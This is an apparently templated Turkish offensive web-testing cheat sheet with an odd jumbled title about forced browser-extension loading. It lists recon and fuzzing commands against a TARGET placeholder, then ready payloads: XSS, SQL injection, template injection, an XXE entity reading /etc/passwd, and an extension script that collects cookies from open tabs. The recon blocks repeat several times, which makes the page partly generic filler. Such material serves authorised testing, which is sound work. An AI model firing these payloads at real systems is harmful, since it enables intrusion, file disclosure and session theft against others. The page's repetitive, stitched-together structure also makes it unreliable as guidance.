Skip to content

Forced Extension Load Preferences Mac Forgery Windows

web offensive

Forced Extension Load Preferences Mac Forgery Windows web saldırı yüzeyidir. Giriş noktalarını izole edip kanıtlanabilir etki (okuma, yazma, RCE, auth bypass) üretmeye odaklan.

  1. Forced Extension Load Preferences Mac Forgery Windows giriş noktalarını (param/header/cookie/upload/API) haritala.

  2. Hedefe özgü payload ve araçlarla hipotezi doğrula.

  3. Okuma/yazma/RCE/bypass etkisini somut kanıtla.

  4. Zincirleme senaryo ve kanıt paketini tamamla.

Hedef yığını, endpoint’leri ve auth sınırını netleştir.

Terminal window
curl -skI https://TARGET/
Terminal window
whatweb -a 3 https://TARGET
Terminal window
katana -u https://TARGET -jc -d 3 -o crawl.txt
Terminal window
ffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -mc 200,204,301,302,403
Terminal window
arjun -u https://TARGET/api/v1/item --get
Terminal window
unzip -l ext.crx || unzip -l ext.zip
Terminal window
jq '.permissions,.host_permissions,.content_scripts' manifest.json
chrome.tabs.query({}, t => chrome.scripting.executeScript({target:{tabId:t[0].id},func:()=>document.cookie}))
XSS in extension page → privilege; clickjack options page
'"><img src=x onerror=alert(1)>
' OR 1=1-- -
{{7*7}}${7*7}#{7*7}
<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><a>&xxe;</a>
Terminal window
nuclei -u https://TARGET -as -silent

Forced Extension Load Preferences Mac Forgery Windows sonuçları hedef sürüme ve yığına göre değişir. Her başarılı adımı request/response ile kaydet; sonraki pivot’u not et.

Terminal window
curl -sk https://TARGET/robots.txt
Terminal window
nuclei -u https://TARGET -as -silent
Terminal window
ffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,403
GET / HTTP/1.1
Host: TARGET
Accept: */*
Terminal window
mkdir -p evidence/web && tee evidence/web/notes.txt

Bu ekler keşif ve kanıt paketini hızlandırır; asıl sömürü üstteki bölümlerdeki konu-özel payload’larla yapılır.

Terminal window
curl -sk https://TARGET/robots.txt
Terminal window
curl -sk https://TARGET/sitemap.xml
Terminal window
ffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,403
Terminal window
nuclei -u https://TARGET -as -silent
GET / HTTP/1.1
Host: TARGET
Accept: */*
Terminal window
mkdir -p evidence/web && tee evidence/web/notes.txt
request/response
zaman damgası
kullanılan hesap
etki özeti
Terminal window
curl -sk https://TARGET/ -D evidence/web/headers.txt -o evidence/web/body.html